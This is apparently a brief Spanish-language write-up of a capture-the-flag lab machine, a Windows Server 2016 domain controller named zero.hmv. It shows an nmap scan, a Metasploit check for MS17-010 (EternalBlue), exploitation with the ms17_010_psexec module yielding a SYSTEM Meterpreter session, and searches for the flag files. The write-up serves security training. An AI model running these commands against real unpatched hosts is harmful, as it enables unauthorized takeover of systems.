Enumeramos puertos (Domain Controller de Active Directory, zero.hmv):
❯ sudo nmap -sCV -Pn -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49670,49671,49694 -oN 02-targeted.txt 192.168.1.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 14:00 -04
Nmap scan report for 192.168.1.29
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: zero.hmv, ...)
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ZERO)
...
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 ...
| Computer name: DC01
| Domain name: zero.hmv
|_ FQDN: DC01.zero.hmv
...Comprobamos con Metasploit que es vulnerable a EternalBlue:
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.29
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.29:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)Lo explotamos con el módulo ms17_010_psexec, obteniendo directamente sesión SYSTEM:
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.29
msf6 exploit(windows/smb/ms17_010_psexec) > set lport 1234
msf6 exploit(windows/smb/ms17_010_psexec) > run
[+] 192.168.1.29:445 - Overwrite complete... SYSTEM session obtained!
[*] Meterpreter session 1 opened ...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMCon permisos SYSTEM solo resta localizar las flags:
C:\>dir /s /b "user.txt"
C:\Users\ruycr4ft\Desktop\user.txt
C:\>dir /s /b "root.txt"
C:\Users\Administrator\Desktop\root.txtFin.